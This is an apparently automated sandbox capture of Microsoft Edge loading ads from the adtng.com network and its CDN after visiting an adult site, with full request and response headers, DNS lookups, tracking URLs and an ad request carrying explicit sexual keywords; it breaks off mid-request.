date: Sat, 05 Oct 2024 16:04:02 GMT
content-type: text/html
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
GET

https://a.adtng.com/get/10010117?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-2&tj_zid=2184351&tj_cid=1006144531&tj_aid=1514215301&infos=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ+phQFA/fgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha+E0gXgAref55UE+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1

msedge.exe

Remote address:

66.254.114.171:443

Request

GET /get/10010117?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-2&tj_zid=2184351&tj_cid=1006144531&tj_aid=1514215301&infos=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ+phQFA/fgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha+E0gXgAref55UE+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1 HTTP/2.0
host: a.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:02 GMT
content-type: text/html
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
GET

https://a.adtng.com/track/adviews/eyJleHRfemlkIjoiMjE4NDM1MSIsImV4dF9jIjoiIiwiZXh0X2FpZCI6IjE1MTQyMTUzMDEiLCJwaWQiOiI0OSIsInNpZCI6IjEwMDEwMTE3IiwibmlkcyI6IjUzOTg4IiwiZHluX2RtbiI6IiIsImNyaWQiOiIxMTE3MDEwIiwic3YiOiIyNjMyNCIsInJlZl9kbW4iOiJ3d3cucG9ybmh1Yi5jb20iLCJleHRfY2lkIjoiMTAwNjE0NDUzMSIsInRzbmFtZSI6Ik1CIiwiY3JjIjoiMTEiLCJjbiI6IjMwMFgyNTBfVElFUl8xLjAiLCJuaWQiOiI1Mzk4OCIsImV4dF9wdWIiOiIiLCJjcnAiOiIyMS40MSIsInRpZCI6IjEiLCJpdCI6IjA1XC9PY3RcLzIwMjQ6MTY6MDQ6MDIgKzAwMDAiLCJjYyI6IjQiLCJzbmNpZCI6IjEwNzE4NCIsImNpZCI6IjM5MDEwIiwiZXh0X3VpZCI6IiIsImNwIjoiNzYuOTIiLCJzbmNjaWQiOiIyNDU5NzgyIiwiaWlkIjoiMDRhZjMxNDcwNGUwYTgzNTc4MmQzMjYxMGRhNjg0Y2MiLCJleHRfaWlkIjoiIn0=?unique_view=1

msedge.exe

Remote address:

66.254.114.171:443

Request

GET /track/adviews/eyJleHRfemlkIjoiMjE4NDM1MSIsImV4dF9jIjoiIiwiZXh0X2FpZCI6IjE1MTQyMTUzMDEiLCJwaWQiOiI0OSIsInNpZCI6IjEwMDEwMTE3IiwibmlkcyI6IjUzOTg4IiwiZHluX2RtbiI6IiIsImNyaWQiOiIxMTE3MDEwIiwic3YiOiIyNjMyNCIsInJlZl9kbW4iOiJ3d3cucG9ybmh1Yi5jb20iLCJleHRfY2lkIjoiMTAwNjE0NDUzMSIsInRzbmFtZSI6Ik1CIiwiY3JjIjoiMTEiLCJjbiI6IjMwMFgyNTBfVElFUl8xLjAiLCJuaWQiOiI1Mzk4OCIsImV4dF9wdWIiOiIiLCJjcnAiOiIyMS40MSIsInRpZCI6IjEiLCJpdCI6IjA1XC9PY3RcLzIwMjQ6MTY6MDQ6MDIgKzAwMDAiLCJjYyI6IjQiLCJzbmNpZCI6IjEwNzE4NCIsImNpZCI6IjM5MDEwIiwiZXh0X3VpZCI6IiIsImNwIjoiNzYuOTIiLCJzbmNjaWQiOiIyNDU5NzgyIiwiaWlkIjoiMDRhZjMxNDcwNGUwYTgzNTc4MmQzMjYxMGRhNjg0Y2MiLCJleHRfaWlkIjoiIn0=?unique_view=1 HTTP/2.0
host: a.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://a.adtng.com/get/10010117?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-2&tj_zid=2184351&tj_cid=1006144531&tj_aid=1514215301&infos=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ+phQFA/fgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha+E0gXgAref55UE+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:03 GMT
content-type: text/html
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
GET

https://a.adtng.com/track/adviews/eyJleHRfemlkIjoiMjE4NDM1MSIsImV4dF9jIjoiIiwiZXh0X2FpZCI6IjE1MTQyMTUzMDEiLCJwaWQiOiI0OSIsInNpZCI6IjEwMDEwMTE3IiwibmlkcyI6IjUzOTg4IiwiZHluX2RtbiI6IiIsImNyaWQiOiIxMTE3MDEwIiwic3YiOiIyNjMyNCIsInJlZl9kbW4iOiJ3d3cucG9ybmh1Yi5jb20iLCJleHRfY2lkIjoiMTAwNjE0NDUzMSIsInRzbmFtZSI6Ik1CIiwiY3JjIjoiMTEiLCJjbiI6IjMwMFgyNTBfVElFUl8xLjAiLCJuaWQiOiI1Mzk4OCIsImV4dF9wdWIiOiIiLCJjcnAiOiIyMS40MSIsInRpZCI6IjEiLCJpdCI6IjA1XC9PY3RcLzIwMjQ6MTY6MDQ6MDIgKzAwMDAiLCJjYyI6IjQiLCJzbmNpZCI6IjEwNzE4NCIsImNpZCI6IjM5MDEwIiwiZXh0X3VpZCI6IiIsImNwIjoiNzYuOTIiLCJzbmNjaWQiOiIyNDU5NzgyIiwiaWlkIjoiMDRhZjMxNDcwNGUwYTgzNTc4MmQzMjYxMGRhNjg0Y2MiLCJleHRfaWlkIjoiIn0=?unique_view=0

msedge.exe

Remote address:

66.254.114.171:443

Request

GET /track/adviews/eyJleHRfemlkIjoiMjE4NDM1MSIsImV4dF9jIjoiIiwiZXh0X2FpZCI6IjE1MTQyMTUzMDEiLCJwaWQiOiI0OSIsInNpZCI6IjEwMDEwMTE3IiwibmlkcyI6IjUzOTg4IiwiZHluX2RtbiI6IiIsImNyaWQiOiIxMTE3MDEwIiwic3YiOiIyNjMyNCIsInJlZl9kbW4iOiJ3d3cucG9ybmh1Yi5jb20iLCJleHRfY2lkIjoiMTAwNjE0NDUzMSIsInRzbmFtZSI6Ik1CIiwiY3JjIjoiMTEiLCJjbiI6IjMwMFgyNTBfVElFUl8xLjAiLCJuaWQiOiI1Mzk4OCIsImV4dF9wdWIiOiIiLCJjcnAiOiIyMS40MSIsInRpZCI6IjEiLCJpdCI6IjA1XC9PY3RcLzIwMjQ6MTY6MDQ6MDIgKzAwMDAiLCJjYyI6IjQiLCJzbmNpZCI6IjEwNzE4NCIsImNpZCI6IjM5MDEwIiwiZXh0X3VpZCI6IiIsImNwIjoiNzYuOTIiLCJzbmNjaWQiOiIyNDU5NzgyIiwiaWlkIjoiMDRhZjMxNDcwNGUwYTgzNTc4MmQzMjYxMGRhNjg0Y2MiLCJleHRfaWlkIjoiIn0=?unique_view=0 HTTP/2.0
host: a.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://a.adtng.com/get/10010117?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-2&tj_zid=2184351&tj_cid=1006144531&tj_aid=1514215301&infos=CiQzYjA3NjFlNC1jOTk2LTQ0NjUtODlhMi00NTI5MjRkMTkwZWEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTIgAjCfqYUBOJ+phQFA/fgESJOY4t8DUgEyWNXrqd4DYKu0yvIDgQGL4H8r2bEhP5IBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCha+E0gXgAref55UE+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:10 GMT
content-type: text/html
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
GET

https://a.adtng.com/get/10000098?&adtool_keyword=anal%2Canal%20sex%2Cbarbie%20sins%2Cbig%20boobs%2Cbig%20cock%2Cbig%20dick%2Cbig%20fake%20tits%2Cbig%20tits%2Cblonde%2Cblonde%20babe%2Cblowjob%2Cbritish%2Ccar%20fuck%2Ccum%20in%20ass%2Cfakedrivingschool%2Chard%20anal%20sex%2Chardcore%2Chd%20porn%2Cin%20the%20ass%2Cpornstar%2Creality%2Criding%20dick%2Cryan%20ryder%2Csucking%20dick&uuid=1627d42a515146059e9355b5da64c021&impid=1627d42a515146059e9355b5da64c021-1&tj_zid=5&tj_cid=1007935951&tj_aid=2071998131&infos=CiRkODY0NGVlZC1jOGI3LTQwZTMtOWQ2NS1kYTQ1MGU5NzY4NDcQgceFuAYaIjE2MjdkNDJhNTE1MTQ2MDU5ZTkzNTViNWRhNjRjMDIxLTEgAjAFOAVAq5EXSM/Dz+ADUgEyWNXrqd4DYJG7tYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB8WjjiLX45D6SAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzI5N4gCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCs92A3AfgAt/Qsp8E+gIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuqAMBwgMFdmlkZW+SBBBBeWxvIFByZW1pdW0gTHRkqAQBsgQCAwHYBDc=&noc=0

msedge.exe

Remote address:

66.254.114.171:443

Request

GET /get/10000098?&adtool_keyword=anal%2Canal%20sex%2Cbarbie%20sins%2Cbig%20boobs%2Cbig%20cock%2Cbig%20dick%2Cbig%20fake%20tits%2Cbig%20tits%2Cblonde%2Cblonde%20babe%2Cblowjob%2Cbritish%2Ccar%20fuck%2Ccum%20in%20ass%2Cfakedrivingschool%2Chard%20anal%20sex%2Chardcore%2Chd%20porn%2Cin%20the%20ass%2Cpornstar%2Creality%2Criding%20dick%2Cryan%20ryder%2Csucking%20dick&uuid=1627d42a515146059e9355b5da64c021&impid=1627d42a515146059e9355b5da64c021-1&tj_zid=5&tj_cid=1007935951&tj_aid=2071998131&infos=CiRkODY0NGVlZC1jOGI3LTQwZTMtOWQ2NS1kYTQ1MGU5NzY4NDcQgceFuAYaIjE2MjdkNDJhNTE1MTQ2MDU5ZTkzNTViNWRhNjRjMDIxLTEgAjAFOAVAq5EXSM/Dz+ADUgEyWNXrqd4DYJG7tYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB8WjjiLX45D6SAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzI5N4gCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCs92A3AfgAt/Qsp8E+gIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuqAMBwgMFdmlkZW+SBBBBeWxvIFByZW1pdW0gTHRkqAQBsgQCAwHYBDc=&noc=0 HTTP/2.0
host: a.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: text/html
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
DNS

156.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

156.114.254.66.in-addr.arpa

IN PTR

Response

156.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

16.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.156.210.64.in-addr.arpa

IN PTR

Response
DNS

72.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.204.58.216.in-addr.arpa

IN PTR

Response

72.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f81e100net

72.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f72�G

72.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f8�G
DNS

52.56.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.56.21.104.in-addr.arpa

IN PTR

Response
DNS

ht-cdn2.adtng.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ht-cdn2.adtng.com

IN A

Response

ht-cdn2.adtng.com

IN CNAME

ht-cdn2.adtng.com.sds.rncdn7.com

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.21

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.23

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.18

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.16

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.22

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.19

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.17

ht-cdn2.adtng.com.sds.rncdn7.com

IN A

64.210.156.20
DNS

hw-cdn2.adtng.com

msedge.exe

Remote address:

8.8.8.8:53

Request

hw-cdn2.adtng.com

IN A

Response

hw-cdn2.adtng.com

IN CNAME

hw-cdn2.adtng.com.lds.rncdn7.com

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.4

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.5

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.0

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.6

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.2

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.3

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.7

hw-cdn2.adtng.com.lds.rncdn7.com

IN A

64.210.156.1
GET

https://hw-cdn2.adtng.com/a7/creatives/221/1559/820086/1115660/1115660_logo.png

msedge.exe

Remote address:

64.210.156.4:443

Request

GET /a7/creatives/221/1559/820086/1115660/1115660_logo.png HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:02 GMT
content-type: image/png
content-length: 26354
last-modified: Fri, 06 Sep 2024 17:59:46 GMT
expires: Thu, 09 Jan 2025 11:57:51 GMT
cache-control: max-age=10690927
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16010-5-92735-h-0-0---;16011-74-3310548----0-0-0
GET

https://hw-cdn2.adtng.com/delivery/intersection_observer/IntersectionObserver.js

msedge.exe

Remote address:

64.210.156.4:443

Request

GET /delivery/intersection_observer/IntersectionObserver.js HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:02 GMT
content-type: application/javascript
content-length: 16885
last-modified: Tue, 05 Apr 2022 20:54:54 GMT
expires: Sun, 17 Mar 2024 01:54:48 GMT
cache-control: max-age=10382487
vary: Accept-Encoding
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16025-2-454097-h-0-0---;16011-28-3310548----0-0-0
GET

https://hw-cdn2.adtng.com/a7/creatives/221/1559/820086/1115660/1115660_video.mp4

msedge.exe

Remote address:

64.210.156.4:443

Request

GET /a7/creatives/221/1559/820086/1115660/1115660_video.mp4 HTTP/2.0
host: hw-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://a.adtng.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:04:03 GMT
content-type: video/mp4
content-length: 484742
last-modified: Fri, 06 Sep 2024 18:05:39 GMT
expires: Thu, 09 Jan 2025 11:57:51 GMT
cache-control: max-age=10690927
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
content-range: bytes 0-484741/484742
x-cdn-diag: lon1-16030-3-2960790-h-0-0---;16011-21-3310548----0-0-0
GET

https://ht-cdn2.adtng.com/delivery/vortex/vortex-simple-1.0.0.js

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /delivery/vortex/vortex-simple-1.0.0.js HTTP/2.0
host: ht-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:02 GMT
content-type: application/javascript
content-length: 5027
last-modified: Fri, 02 Nov 2018 14:17:11 GMT
etag: "13a3-579af30f7688b"
expires: Sun, 28 Jul 2024 20:21:06 GMT
cache-control: max-age=10797801
vary: Accept-Encoding
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16007-3-206878-h-0-0---;16032-120-559501----0-0-0
GET

https://ht-cdn2.adtng.com/a7/creatives/1/49/820339/1117010/1117010_logo.png

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /a7/creatives/1/49/820339/1117010/1117010_logo.png HTTP/2.0
host: ht-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://a.adtng.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:02 GMT
content-type: image/png
content-length: 7243
last-modified: Wed, 25 Sep 2024 15:55:33 GMT
etag: "1c4b-622f3a6e9c740"
expires: Tue, 04 Feb 2025 00:12:10 GMT
cache-control: max-age=10573454
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
accept-ranges: bytes
x-cdn-diag: lon1-16009-2-3934205-h-0-0---;16032-120-559501----0-0-0
GET

https://ht-cdn2.adtng.com/a7/creatives/1/49/820339/1117010/1117010_video.mp4

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /a7/creatives/1/49/820339/1117010/1117010_video.mp4 HTTP/2.0
host: ht-cdn2.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
